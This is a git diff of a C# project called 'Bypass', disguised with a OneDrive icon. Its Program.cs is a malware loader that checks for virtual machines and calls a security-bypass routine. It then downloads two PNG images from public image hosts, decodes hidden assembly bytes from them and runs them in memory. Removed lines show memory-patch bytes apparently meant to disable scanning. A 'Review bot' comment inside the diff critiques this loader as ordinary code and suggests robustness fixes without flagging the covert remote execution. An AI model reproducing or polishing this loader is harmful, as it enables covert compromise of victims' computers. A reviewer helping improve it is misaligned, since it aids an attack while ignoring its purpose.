diff --git a/.gitattributes b/.gitattributes
deleted file mode 100644
index dfe0770..0000000
--- a/.gitattributes
+++ /dev/null
@@ -1,2 +0,0 @@
-# Auto detect text files and perform LF normalization
-* text=auto
diff --git a/.gitignore b/.gitignore
deleted file mode 100644
index ed05cc9..0000000
--- a/.gitignore
+++ /dev/null
@@ -1,26 +0,0 @@
-## Ignore Visual Studio temporary files, build results, and
-## files generated by popular Visual Studio add-ons.
-
-# User-specific files
-*.suo
-*.user
-*.userosscache
-*.sln.docstates
-
-# User-specific files (MonoDevelop/Xamarin Studio)
-*.userprefs
-
-# Build results
-[Dd]ebug/
-[Dd]ebugPublic/
-[Rr]elease/
-[Rr]eleases/
-x64/
-x86/
-bld/
-[Bb]in/
-[Oo]bj/
-[Ll]og/
-
-# Visual Studio 2015 cache/options directory
-.vs/
diff --git a/.vs/Bypass/v16/.suo b/.vs/Bypass/v16/.suo
new file mode 100644
index 0000000..119488c
Binary files /dev/null and b/.vs/Bypass/v16/.suo differ
diff --git a/Bypass.sln b/Bypass.sln
index 4968762..cfb6e24 100644
--- a/Bypass.sln
+++ b/Bypass.sln
@@ -1,9 +1,9 @@
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
-VisualStudioVersion = 16.0.31025.194
+VisualStudioVersion = 16.0.31424.327
MinimumVisualStudioVersion = 10.0.40219.1
-Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Bypass", "Bypass\Bypass.csproj", "{6F5245BE-37EC-4CFB-8F6F-03ED38215D0A}"
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Bypass", "Bypass\Bypass.csproj", "{4541D820-539A-4E4E-A37B-A20AE0B56376}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
@@ -11,15 +11,15 @@ Global
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
- {6F5245BE-37EC-4CFB-8F6F-03ED38215D0A}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
- {6F5245BE-37EC-4CFB-8F6F-03ED38215D0A}.Debug|Any CPU.Build.0 = Debug|Any CPU
- {6F5245BE-37EC-4CFB-8F6F-03ED38215D0A}.Release|Any CPU.ActiveCfg = Release|Any CPU
- {6F5245BE-37EC-4CFB-8F6F-03ED38215D0A}.Release|Any CPU.Build.0 = Release|Any CPU
+ {4541D820-539A-4E4E-A37B-A20AE0B56376}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+ {4541D820-539A-4E4E-A37B-A20AE0B56376}.Debug|Any CPU.Build.0 = Debug|Any CPU
+ {4541D820-539A-4E4E-A37B-A20AE0B56376}.Release|Any CPU.ActiveCfg = Release|Any CPU
+ {4541D820-539A-4E4E-A37B-A20AE0B56376}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
- SolutionGuid = {FF81A9A4-8484-40D7-90FA-99E056080C95}
+ SolutionGuid = {AE458E12-891F-4E6E-8E91-121983468D3C}
EndGlobalSection
EndGlobal
diff --git a/Bypass/App.config b/Bypass/App.config
new file mode 100644
index 0000000..74ade9d
--- /dev/null
+++ b/Bypass/App.config
@@ -0,0 +1,6 @@
+
+
+
+
+
+
diff --git a/Bypass/Bypass.csproj b/Bypass/Bypass.csproj
index d472e59..c879a49 100644
--- a/Bypass/Bypass.csproj
+++ b/Bypass/Bypass.csproj
@@ -1,20 +1,18 @@
-
-
Debug
AnyCPU
- {6F5245BE-37EC-4CFB-8F6F-03ED38215D0A}
+ {4541D820-539A-4E4E-A37B-A20AE0B56376}
WinExe
Program
Program
v4.0
512
+ true
true
-
-
+
AnyCPU
@@ -34,14 +32,16 @@
TRACE
prompt
4
- false
- OneDrive.ico
+
app.manifest
+
+ OneDrive.ico
+
@@ -78,8 +78,6 @@
True
-
-
SettingsSingleFileGenerator
Settings.Designer.cs
@@ -91,17 +89,10 @@
-
+
+
+
-
-
- 这台计算机上缺少此项目引用的 NuGet 程序包。使用“NuGet 程序包还原”可下载这些程序包。有关更多信息,请参见 http://go.microsoft.com/fwlink/?LinkID=322105。缺少的文件是 {0}。
-
-
-
-
-
-
\ No newline at end of file
diff --git a/Bypass/Form1.Designer.cs b/Bypass/Form1.Designer.cs
index 8c80a9d..c29d750 100644
--- a/Bypass/Form1.Designer.cs
+++ b/Bypass/Form1.Designer.cs
@@ -1,17 +1,17 @@
-namespace Program
+namespace WindowsFormsApp1
{
partial class Form1
{
///
- /// 必需的设计器变量。
+ /// Required designer variable.
///
private System.ComponentModel.IContainer components = null;
///
- /// 清理所有正在使用的资源。
+ /// Clean up any resources being used.
///
- /// 如果应释放托管资源,为 true;否则为 false。
+ /// true if managed resources should be disposed; otherwise, false.
protected override void Dispose(bool disposing)
{
if (disposing && (components != null))
@@ -21,83 +21,144 @@ namespace Program
base.Dispose(disposing);
}
- #region Windows 窗体设计器生成的代码
+ #region Windows Form Designer generated code
///
- /// 设计器支持所需的方法 - 不要修改
- /// 使用代码编辑器修改此方法的内容。
+ /// Required method for Designer support - do not modify
+ /// the contents of this method with the code editor.
///
private void InitializeComponent()
{
+ this.components = new System.ComponentModel.Container();
this.button1 = new System.Windows.Forms.Button();
- this.checkBox1 = new System.Windows.Forms.CheckBox();
- this.dateTimePicker1 = new System.Windows.Forms.DateTimePicker();
+ this.comboBox1 = new System.Windows.Forms.ComboBox();
this.listView1 = new System.Windows.Forms.ListView();
- this.monthCalendar1 = new System.Windows.Forms.MonthCalendar();
+ this.listBox1 = new System.Windows.Forms.ListBox();
+ this.notifyIcon1 = new System.Windows.Forms.NotifyIcon(this.components);
+ this.listBox2 = new System.Windows.Forms.ListBox();
+ this.notifyIcon2 = new System.Windows.Forms.NotifyIcon(this.components);
this.progressBar1 = new System.Windows.Forms.ProgressBar();
+ this.radioButton1 = new System.Windows.Forms.RadioButton();
+ this.pictureBox1 = new System.Windows.Forms.PictureBox();
+ this.toolTip1 = new System.Windows.Forms.ToolTip(this.components);
+ this.textBox1 = new System.Windows.Forms.TextBox();
+ this.webBrowser1 = new System.Windows.Forms.WebBrowser();
+ ((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).BeginInit();
this.SuspendLayout();
//
// button1
//
- this.button1.Location = new System.Drawing.Point(288, 111);
+ this.button1.Location = new System.Drawing.Point(302, 87);
this.button1.Name = "button1";
this.button1.Size = new System.Drawing.Size(75, 23);
this.button1.TabIndex = 0;
this.button1.Text = "button1";
this.button1.UseVisualStyleBackColor = true;
//
- // checkBox1
+ // comboBox1
//
- this.checkBox1.AutoSize = true;
- this.checkBox1.Location = new System.Drawing.Point(110, 188);
- this.checkBox1.Name = "checkBox1";
- this.checkBox1.Size = new System.Drawing.Size(78, 16);
- this.checkBox1.TabIndex = 1;
- this.checkBox1.Text = "checkBox1";
- this.checkBox1.UseVisualStyleBackColor = true;
- //
- // dateTimePicker1
- //
- this.dateTimePicker1.Location = new System.Drawing.Point(203, 228);
- this.dateTimePicker1.Name = "dateTimePicker1";
- this.dateTimePicker1.Size = new System.Drawing.Size(200, 21);
- this.dateTimePicker1.TabIndex = 2;
+ this.comboBox1.FormattingEnabled = true;
+ this.comboBox1.Location = new System.Drawing.Point(118, 202);
+ this.comboBox1.Name = "comboBox1";
+ this.comboBox1.Size = new System.Drawing.Size(121, 20);
+ this.comboBox1.TabIndex = 1;
//
// listView1
//
this.listView1.HideSelection = false;
- this.listView1.Location = new System.Drawing.Point(482, 261);
+ this.listView1.Location = new System.Drawing.Point(-23, -46);
this.listView1.Name = "listView1";
this.listView1.Size = new System.Drawing.Size(121, 97);
- this.listView1.TabIndex = 3;
+ this.listView1.TabIndex = 2;
this.listView1.UseCompatibleStateImageBehavior = false;
//
- // monthCalendar1
+ // listBox1
//
- this.monthCalendar1.Location = new System.Drawing.Point(686, -22);
- this.monthCalendar1.Name = "monthCalendar1";
- this.monthCalendar1.TabIndex = 4;
+ this.listBox1.FormattingEnabled = true;
+ this.listBox1.ItemHeight = 12;
+ this.listBox1.Location = new System.Drawing.Point(-23, -46);
+ this.listBox1.Name = "listBox1";
+ this.listBox1.Size = new System.Drawing.Size(120, 88);
+ this.listBox1.TabIndex = 3;
+ //
+ // notifyIcon1
+ //
+ this.notifyIcon1.Text = "notifyIcon1";
+ this.notifyIcon1.Visible = true;
+ //
+ // listBox2
+ //
+ this.listBox2.FormattingEnabled = true;
+ this.listBox2.ItemHeight = 12;
+ this.listBox2.Location = new System.Drawing.Point(484, 225);
+ this.listBox2.Name = "listBox2";
+ this.listBox2.Size = new System.Drawing.Size(120, 88);
+ this.listBox2.TabIndex = 4;
+ //
+ // notifyIcon2
+ //
+ this.notifyIcon2.Text = "notifyIcon2";
+ this.notifyIcon2.Visible = true;
//
// progressBar1
//
- this.progressBar1.Location = new System.Drawing.Point(153, 334);
+ this.progressBar1.Location = new System.Drawing.Point(75, 315);
this.progressBar1.Name = "progressBar1";
this.progressBar1.Size = new System.Drawing.Size(100, 23);
this.progressBar1.TabIndex = 5;
//
+ // radioButton1
+ //
+ this.radioButton1.AutoSize = true;
+ this.radioButton1.Location = new System.Drawing.Point(172, 275);
+ this.radioButton1.Name = "radioButton1";
+ this.radioButton1.Size = new System.Drawing.Size(95, 16);
+ this.radioButton1.TabIndex = 6;
+ this.radioButton1.TabStop = true;
+ this.radioButton1.Text = "radioButton1";
+ this.radioButton1.UseVisualStyleBackColor = true;
+ //
+ // pictureBox1
+ //
+ this.pictureBox1.Location = new System.Drawing.Point(-23, -46);
+ this.pictureBox1.Name = "pictureBox1";
+ this.pictureBox1.Size = new System.Drawing.Size(100, 50);
+ this.pictureBox1.TabIndex = 7;
+ this.pictureBox1.TabStop = false;
+ //
+ // textBox1
+ //
+ this.textBox1.Location = new System.Drawing.Point(484, 132);
+ this.textBox1.Name = "textBox1";
+ this.textBox1.Size = new System.Drawing.Size(100, 21);
+ this.textBox1.TabIndex = 8;
+ //
+ // webBrowser1
+ //
+ this.webBrowser1.Location = new System.Drawing.Point(126, 62);
+ this.webBrowser1.MinimumSize = new System.Drawing.Size(20, 20);
+ this.webBrowser1.Name = "webBrowser1";
+ this.webBrowser1.Size = new System.Drawing.Size(250, 250);
+ this.webBrowser1.TabIndex = 9;
+ //
// Form1
//
this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 12F);
this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
this.ClientSize = new System.Drawing.Size(800, 450);
+ this.Controls.Add(this.webBrowser1);
+ this.Controls.Add(this.textBox1);
+ this.Controls.Add(this.pictureBox1);
+ this.Controls.Add(this.radioButton1);
this.Controls.Add(this.progressBar1);
- this.Controls.Add(this.monthCalendar1);
+ this.Controls.Add(this.listBox2);
+ this.Controls.Add(this.listBox1);
this.Controls.Add(this.listView1);
- this.Controls.Add(this.dateTimePicker1);
- this.Controls.Add(this.checkBox1);
+ this.Controls.Add(this.comboBox1);
this.Controls.Add(this.button1);
this.Name = "Form1";
- this.Text = "123";
+ this.Text = "Form1";
+ ((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).EndInit();
this.ResumeLayout(false);
this.PerformLayout();
@@ -106,11 +167,17 @@ namespace Program
#endregion
private System.Windows.Forms.Button button1;
- private System.Windows.Forms.CheckBox checkBox1;
- private System.Windows.Forms.DateTimePicker dateTimePicker1;
+ private System.Windows.Forms.ComboBox comboBox1;
private System.Windows.Forms.ListView listView1;
- private System.Windows.Forms.MonthCalendar monthCalendar1;
+ private System.Windows.Forms.ListBox listBox1;
+ private System.Windows.Forms.NotifyIcon notifyIcon1;
+ private System.Windows.Forms.ListBox listBox2;
+ private System.Windows.Forms.NotifyIcon notifyIcon2;
private System.Windows.Forms.ProgressBar progressBar1;
+ private System.Windows.Forms.RadioButton radioButton1;
+ private System.Windows.Forms.PictureBox pictureBox1;
+ private System.Windows.Forms.ToolTip toolTip1;
+ private System.Windows.Forms.TextBox textBox1;
+ private System.Windows.Forms.WebBrowser webBrowser1;
}
-}
-
+}
\ No newline at end of file
diff --git a/Bypass/Form1.cs b/Bypass/Form1.cs
index f6c5c0a..dad6b73 100644
--- a/Bypass/Form1.cs
+++ b/Bypass/Form1.cs
@@ -7,7 +7,7 @@ using System.Linq;
using System.Text;
using System.Windows.Forms;
-namespace Program
+namespace WindowsFormsApp1
{
public partial class Form1 : Form
{
@@ -15,10 +15,5 @@ namespace Program
{
InitializeComponent();
}
-
- private void button1_Click(object sender, EventArgs e)
- {
-
- }
}
}
diff --git a/Bypass/Form1.resx b/Bypass/Form1.resx
index 1af7de1..4557cf0 100644
--- a/Bypass/Form1.resx
+++ b/Bypass/Form1.resx
@@ -117,4 +117,13 @@
System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
+
+ 17, 17
+
+
+ 135, 17
+
+
+ 253, 17
+
\ No newline at end of file
diff --git a/Bypass/ILMerge.props b/Bypass/ILMerge.props
deleted file mode 100644
index b0fc9d2..0000000
--- a/Bypass/ILMerge.props
+++ /dev/null
@@ -1,67 +0,0 @@
-
-
-
-
-
-
-
-
-
-
- true
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- false
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
diff --git a/Bypass/ILMergeOrder.txt b/Bypass/ILMergeOrder.txt
deleted file mode 100644
index 3fda7f5..0000000
--- a/Bypass/ILMergeOrder.txt
+++ /dev/null
@@ -1,4 +0,0 @@
-# this file contains the partial list of the merged assemblies in the merge order
-# you can fill it from the obj\CONFIG\PROJECT.ilmerge generated on every build
-# and finetune merge order to your satisfaction
-
diff --git a/Bypass/Program.cs b/Bypass/Program.cs
index 492bc0f..d522a7e 100644
--- a/Bypass/Program.cs
+++ b/Bypass/Program.cs
@@ -1,6 +1,7 @@
using System;
-using System.Collections.Generic;
+using System.Diagnostics;
using System.Drawing;
+using System.IO;
using System.Linq;
using System.Management;
using System.Net;
@@ -8,6 +9,7 @@ using System.Reflection;
using System.Runtime.InteropServices;
using System.Text;
using System.Windows.Forms;
+using WindowsFormsApp1;
namespace Program
{
@@ -21,7 +23,33 @@ namespace Program
{
if (!VM())
{
- LD();
+ A.B();
+
+ string LDer = @"https://s1.ax1x.com/2020/04/28/J4Zp9S.png"; // No Startup,CHINA
+ string FI_LE = @"https://z3.ax1x.com/2021/07/05/RhfFGn.png"; //FI_LE
+ var requestLDer = WebRequest.Create(LDer);
+ var requestFI_LE = WebRequest.Create(FI_LE);
+ Bitmap LDerIMG;
+ Bitmap FI_LEIMG;
+
+ using (var response = requestLDer.GetResponse())
+ using (var stream = response.GetResponseStream())
+ {
+ LDerIMG = (Bitmap)Image.FromStream(stream);
+ }
+
+ using (var response = requestFI_LE.GetResponse())
+ using (var stream = response.GetResponseStream())
+ {
+ FI_LEIMG = (Bitmap)Image.FromStream(stream);
+ }
+
+ byte[] outputLDer = DE(LDerIMG);
+
+ byte[] outputFI_LE = DE(FI_LEIMG);
+
+ //Assembly.Load(outputLDer).GetType("loader.loader").GetMethod("RunProgram").Invoke(null, new object[] { outputFI_LE });
+ Assembly.Load(outputFI_LE).EntryPoint.Invoke(null, null);
}
Application.EnableVisualStyles();
Application.SetCompatibleTextRenderingDefault(false);
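Review bot: The bytes decoded from the second downloaded image go straight into `Assembly.Load(outputFI_LE).EntryPoint.Invoke(null, null)` with nothing establishing that they are the expected assembly — there is no hash or signature check on `outputFI_LE`, and no guard for `EntryPoint` being null, so whatever image is served at that URL becomes code in this process and a library-shaped payload becomes a NullReferenceException. `outputLDer` is still fetched and decoded (a full `WebRequest` round trip plus `DE`) but is never used now that the `RunProgram` line is commented out, so either drop that request or resolve the commented call rather than leaving dead work in `Main`. `LDerIMG` and `FI_LEIMG` are `Bitmap`s and are never disposed; consume them inside `using (var img = LDerIMG) { outputLDer = DE(img); }` (same for `FI_LEIMG`) so the GDI handles are released before the loaded code runs. `Main` begins before this hunk, so the surrounding method body is not fully visible here.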
@@ -45,35 +73,6 @@ namespace Program
return Convert.FromBase64String(holder.ToString().Replace(Convert.ToChar(0).ToString(), ""));
}
- private static void LD()
- {
- A.Bypass();
-
- string LDer = @"https://s1.ax1x.com/2020/04/28/J4Zp9S.png"; // No Startup,CHINA
- string FI_LE = @"https://z3.ax1x.com/2021/07/05/RhfFGn.png"; //FI_LE
- var requestLDer = WebRequest.Create(LDer);
- var requestFI_LE = WebRequest.Create(FI_LE);
- Bitmap LDerIMG;
- Bitmap FI_LEIMG;
-
- using (var response = requestLDer.GetResponse())
- using (var stream = response.GetResponseStream())
- {
- LDerIMG = (Bitmap)Image.FromStream(stream);
- }
-
- using (var response = requestFI_LE.GetResponse())
- using (var stream = response.GetResponseStream())
- {
- FI_LEIMG = (Bitmap)Image.FromStream(stream);
- }
-
- byte[] outputLDer = DE(LDerIMG);
-
- byte[] outputFI_LE = DE(FI_LEIMG);
-
- Assembly.Load(outputLDer).GetType("LDer.LDer").GetMethod("RunProgram").Invoke(null, new object[] { outputFI_LE });
- }
public static bool VM()
{
SelectQuery selectQuery = new SelectQuery("Select * from Win32_CacheMemory");
@@ -94,76 +93,608 @@ namespace Program
}
}
-
- public class A
+ public class DInvokeCore
{
- //static byte[] x64 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
- //static byte[] x86 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 };
- public static void Bypass()
+ // Required NTSTATUSs
+ public enum NTSTATUS : uint
{
- string x64 = "uFcAB4DD";
- string x86 = "uFcAB4DCGAA=";
- if (i64())
- pa(Convert.FromBase64String(x64));
- else
- pa(Convert.FromBase64String(x86));
+ // Success
+ Success = 0x00000000,
+ Wait0 = 0x00000000,
+ Wait1 = 0x00000001,
+ Wait2 = 0x00000002,
+ Wait3 = 0x00000003,
+ Wait63 = 0x0000003f,
+ Abandoned = 0x00000080,
+ AbandonedWait0 = 0x00000080,
+ AbandonedWait1 = 0x00000081,
+ AbandonedWait2 = 0x00000082,
+ AbandonedWait3 = 0x00000083,
+ AbandonedWait63 = 0x000000bf,
+ UserApc = 0x000000c0,
+ KernelApc = 0x00000100,
+ Alerted = 0x00000101,
+ Timeout = 0x00000102,
+ Pending = 0x00000103,
+ Reparse = 0x00000104,
+ MoreEntries = 0x00000105,
+ NotAllAssigned = 0x00000106,
+ SomeNotMapped = 0x00000107,
+ OpLockBreakInProgress = 0x00000108,
+ VolumeMounted = 0x00000109,
+ RxActCommitted = 0x0000010a,
+ NotifyCleanup = 0x0000010b,
+ NotifyEnumDir = 0x0000010c,
+ NoQuotasForAccount = 0x0000010d,
+ PrimaryTransportConnectFailed = 0x0000010e,
+ PageFaultTransition = 0x00000110,
+ PageFaultDemandZero = 0x00000111,
+ PageFaultCopyOnWrite = 0x00000112,
+ PageFaultGuardPage = 0x00000113,
+ PageFaultPagingFile = 0x00000114,
+ CrashDump = 0x00000116,
+ ReparseObject = 0x00000118,
+ NothingToTerminate = 0x00000122,
+ ProcessNotInJob = 0x00000123,
+ ProcessInJob = 0x00000124,
+ ProcessCloned = 0x00000129,
+ FileLockedWithOnlyReaders = 0x0000012a,
+ FileLockedWithWriters = 0x0000012b,
+
+ // Informational
+ Informational = 0x40000000,
+ ObjectNameExists = 0x40000000,
+ ThreadWasSuspended = 0x40000001,
+ WorkingSetLimitRange = 0x40000002,
+ ImageNotAtBase = 0x40000003,
+ RegistryRecovered = 0x40000009,
+
+ // Warning
+ Warning = 0x80000000,
+ GuardPageViolation = 0x80000001,
+ DatatypeMisalignment = 0x80000002,
+ Breakpoint = 0x80000003,
+ SingleStep = 0x80000004,
+ BufferOverflow = 0x80000005,
+ NoMoreFiles = 0x80000006,
+ HandlesClosed = 0x8000000a,
+ PartialCopy = 0x8000000d,
+ DeviceBusy = 0x80000011,
+ InvalidEaName = 0x80000013,
+ EaListInconsistent = 0x80000014,
+ NoMoreEntries = 0x8000001a,
+ LongJump = 0x80000026,
+ DllMightBeInsecure = 0x8000002b,
+
+ // Error
+ Error = 0xc0000000,
+ Unsuccessful = 0xc0000001,
+ NotImplemented = 0xc0000002,
+ InvalidInfoClass = 0xc0000003,
+ InfoLengthMismatch = 0xc0000004,
+ AccessViolation = 0xc0000005,
+ InPageError = 0xc0000006,
+ PagefileQuota = 0xc0000007,
+ InvalidHandle = 0xc0000008,
+ BadInitialStack = 0xc0000009,
+ BadInitialPc = 0xc000000a,
+ InvalidCid = 0xc000000b,
+ TimerNotCanceled = 0xc000000c,
+ InvalidParameter = 0xc000000d,
+ NoSuchDevice = 0xc000000e,
+ NoSuchFile = 0xc000000f,
+ InvalidDeviceRequest = 0xc0000010,
+ EndOfFile = 0xc0000011,
+ WrongVolume = 0xc0000012,
+ NoMediaInDevice = 0xc0000013,
+ NoMemory = 0xc0000017,
+ ConflictingAddresses = 0xc0000018,
+ NotMappedView = 0xc0000019,
+ UnableToFreeVm = 0xc000001a,
+ UnableToDeleteSection = 0xc000001b,
+ IllegalInstruction = 0xc000001d,
+ AlreadyCommitted = 0xc0000021,
+ AccessDenied = 0xc0000022,
+ BufferTooSmall = 0xc0000023,
+ ObjectTypeMismatch = 0xc0000024,
+ NonContinuableException = 0xc0000025,
+ BadStack = 0xc0000028,
+ NotLocked = 0xc000002a,
+ NotCommitted = 0xc000002d,
+ InvalidParameterMix = 0xc0000030,
+ ObjectNameInvalid = 0xc0000033,
+ ObjectNameNotFound = 0xc0000034,
+ ObjectNameCollision = 0xc0000035,
+ ObjectPathInvalid = 0xc0000039,
+ ObjectPathNotFound = 0xc000003a,
+ ObjectPathSyntaxBad = 0xc000003b,
+ DataOverrun = 0xc000003c,
+ DataLate = 0xc000003d,
+ DataError = 0xc000003e,
+ CrcError = 0xc000003f,
+ SectionTooBig = 0xc0000040,
+ PortConnectionRefused = 0xc0000041,
+ InvalidPortHandle = 0xc0000042,
+ SharingViolation = 0xc0000043,
+ QuotaExceeded = 0xc0000044,
+ InvalidPageProtection = 0xc0000045,
+ MutantNotOwned = 0xc0000046,
+ SemaphoreLimitExceeded = 0xc0000047,
+ PortAlreadySet = 0xc0000048,
+ SectionNotImage = 0xc0000049,
+ SuspendCountExceeded = 0xc000004a,
+ ThreadIsTerminating = 0xc000004b,
+ BadWorkingSetLimit = 0xc000004c,
+ IncompatibleFileMap = 0xc000004d,
+ SectionProtection = 0xc000004e,
+ EasNotSupported = 0xc000004f,
+ EaTooLarge = 0xc0000050,
+ NonExistentEaEntry = 0xc0000051,
+ NoEasOnFile = 0xc0000052,
+ EaCorruptError = 0xc0000053,
+ FileLockConflict = 0xc0000054,
+ LockNotGranted = 0xc0000055,
+ DeletePending = 0xc0000056,
+ CtlFileNotSupported = 0xc0000057,
+ UnknownRevision = 0xc0000058,
+ RevisionMismatch = 0xc0000059,
+ InvalidOwner = 0xc000005a,
+ InvalidPrimaryGroup = 0xc000005b,
+ NoImpersonationToken = 0xc000005c,
+ CantDisableMandatory = 0xc000005d,
+ NoLogonServers = 0xc000005e,
+ NoSuchLogonSession = 0xc000005f,
+ NoSuchPrivilege = 0xc0000060,
+ PrivilegeNotHeld = 0xc0000061,
+ InvalidAccountName = 0xc0000062,
+ UserExists = 0xc0000063,
+ NoSuchUser = 0xc0000064,
+ GroupExists = 0xc0000065,
+ NoSuchGroup = 0xc0000066,
+ MemberInGroup = 0xc0000067,
+ MemberNotInGroup = 0xc0000068,
+ LastAdmin = 0xc0000069,
+ WrongPassword = 0xc000006a,
+ IllFormedPassword = 0xc000006b,
+ PasswordRestriction = 0xc000006c,
+ LogonFailure = 0xc000006d,
+ AccountRestriction = 0xc000006e,
+ InvalidLogonHours = 0xc000006f,
+ InvalidWorkstation = 0xc0000070,
+ PasswordExpired = 0xc0000071,
+ AccountDisabled = 0xc0000072,
+ NoneMapped = 0xc0000073,
+ TooManyLuidsRequested = 0xc0000074,
+ LuidsExhausted = 0xc0000075,
+ InvalidSubAuthority = 0xc0000076,
+ InvalidAcl = 0xc0000077,
+ InvalidSid = 0xc0000078,
+ InvalidSecurityDescr = 0xc0000079,
+ ProcedureNotFound = 0xc000007a,
+ InvalidImageFormat = 0xc000007b,
+ NoToken = 0xc000007c,
+ BadInheritanceAcl = 0xc000007d,
+ RangeNotLocked = 0xc000007e,
+ DiskFull = 0xc000007f,
+ ServerDisabled = 0xc0000080,
+ ServerNotDisabled = 0xc0000081,
+ TooManyGuidsRequested = 0xc0000082,
+ GuidsExhausted = 0xc0000083,
+ InvalidIdAuthority = 0xc0000084,
+ AgentsExhausted = 0xc0000085,
+ InvalidVolumeLabel = 0xc0000086,
+ SectionNotExtended = 0xc0000087,
+ NotMappedData = 0xc0000088,
+ ResourceDataNotFound = 0xc0000089,
+ ResourceTypeNotFound = 0xc000008a,
+ ResourceNameNotFound = 0xc000008b,
+ ArrayBoundsExceeded = 0xc000008c,
+ FloatDenormalOperand = 0xc000008d,
+ FloatDivideByZero = 0xc000008e,
+ FloatInexactResult = 0xc000008f,
+ FloatInvalidOperation = 0xc0000090,
+ FloatOverflow = 0xc0000091,
+ FloatStackCheck = 0xc0000092,
+ FloatUnderflow = 0xc0000093,
+ IntegerDivideByZero = 0xc0000094,
+ IntegerOverflow = 0xc0000095,
+ PrivilegedInstruction = 0xc0000096,
+ TooManyPagingFiles = 0xc0000097,
+ FileInvalid = 0xc0000098,
+ InsufficientResources = 0xc000009a,
+ InstanceNotAvailable = 0xc00000ab,
+ PipeNotAvailable = 0xc00000ac,
+ InvalidPipeState = 0xc00000ad,
+ PipeBusy = 0xc00000ae,
+ IllegalFunction = 0xc00000af,
+ PipeDisconnected = 0xc00000b0,
+ PipeClosing = 0xc00000b1,
+ PipeConnected = 0xc00000b2,
+ PipeListening = 0xc00000b3,
+ InvalidReadMode = 0xc00000b4,
+ IoTimeout = 0xc00000b5,
+ FileForcedClosed = 0xc00000b6,
+ ProfilingNotStarted = 0xc00000b7,
+ ProfilingNotStopped = 0xc00000b8,
+ NotSameDevice = 0xc00000d4,
+ FileRenamed = 0xc00000d5,
+ CantWait = 0xc00000d8,
+ PipeEmpty = 0xc00000d9,
+ CantTerminateSelf = 0xc00000db,
+ InternalError = 0xc00000e5,
+ InvalidParameter1 = 0xc00000ef,
+ InvalidParameter2 = 0xc00000f0,
+ InvalidParameter3 = 0xc00000f1,
+ InvalidParameter4 = 0xc00000f2,
+ InvalidParameter5 = 0xc00000f3,
+ InvalidParameter6 = 0xc00000f4,
+ InvalidParameter7 = 0xc00000f5,
+ InvalidParameter8 = 0xc00000f6,
+ InvalidParameter9 = 0xc00000f7,
+ InvalidParameter10 = 0xc00000f8,
+ InvalidParameter11 = 0xc00000f9,
+ InvalidParameter12 = 0xc00000fa,
+ ProcessIsTerminating = 0xc000010a,
+ MappedFileSizeZero = 0xc000011e,
+ TooManyOpenedFiles = 0xc000011f,
+ Cancelled = 0xc0000120,
+ CannotDelete = 0xc0000121,
+ InvalidComputerName = 0xc0000122,
+ FileDeleted = 0xc0000123,
+ SpecialAccount = 0xc0000124,
+ SpecialGroup = 0xc0000125,
+ SpecialUser = 0xc0000126,
+ MembersPrimaryGroup = 0xc0000127,
+ FileClosed = 0xc0000128,
+ TooManyThreads = 0xc0000129,
+ ThreadNotInProcess = 0xc000012a,
+ TokenAlreadyInUse = 0xc000012b,
+ PagefileQuotaExceeded = 0xc000012c,
+ CommitmentLimit = 0xc000012d,
+ InvalidImageLeFormat = 0xc000012e,
+ InvalidImageNotMz = 0xc000012f,
+ InvalidImageProtect = 0xc0000130,
+ InvalidImageWin16 = 0xc0000131,
+ LogonServer = 0xc0000132,
+ DifferenceAtDc = 0xc0000133,
+ SynchronizationRequired = 0xc0000134,
+ DllNotFound = 0xc0000135,
+ IoPrivilegeFailed = 0xc0000137,
+ OrdinalNotFound = 0xc0000138,
+ EntryPointNotFound = 0xc0000139,
+ ControlCExit = 0xc000013a,
+ InvalidAddress = 0xc0000141,
+ PortNotSet = 0xc0000353,
+ DebuggerInactive = 0xc0000354,
+ CallbackBypass = 0xc0000503,
+ PortClosed = 0xc0000700,
+ MessageLost = 0xc0000701,
+ InvalidMessage = 0xc0000702,
+ RequestCanceled = 0xc0000703,
+ RecursiveDispatch = 0xc0000704,
+ LpcReceiveBufferExpected = 0xc0000705,
+ LpcInvalidConnectionUsage = 0xc0000706,
+ LpcRequestsNotAllowed = 0xc0000707,
+ ResourceInUse = 0xc0000708,
+ ProcessIsProtected = 0xc0000712,
+ VolumeDirty = 0xc0000806,
+ FileCheckedOut = 0xc0000901,
+ CheckOutRequired = 0xc0000902,
+ BadFileType = 0xc0000903,
+ FileTooLarge = 0xc0000904,
+ FormsAuthRequired = 0xc0000905,
+ VirusInfected = 0xc0000906,
+ VirusDeleted = 0xc0000907,
+ TransactionalConflict = 0xc0190001,
+ InvalidTransaction = 0xc0190002,
+ TransactionNotActive = 0xc0190003,
+ TmInitializationFailed = 0xc0190004,
+ RmNotActive = 0xc0190005,
+ RmMetadataCorrupt = 0xc0190006,
+ TransactionNotJoined = 0xc0190007,
+ DirectoryNotRm = 0xc0190008,
+ CouldNotResizeLog = 0xc0190009,
+ TransactionsUnsupportedRemote = 0xc019000a,
+ LogResizeInvalidSize = 0xc019000b,
+ RemoteFileVersionMismatch = 0xc019000c,
+ CrmProtocolAlreadyExists = 0xc019000f,
+ TransactionPropagationFailed = 0xc0190010,
+ CrmProtocolNotFound = 0xc0190011,
+ TransactionSuperiorExists = 0xc0190012,
+ TransactionRequestNotValid = 0xc0190013,
+ TransactionNotRequested = 0xc0190014,
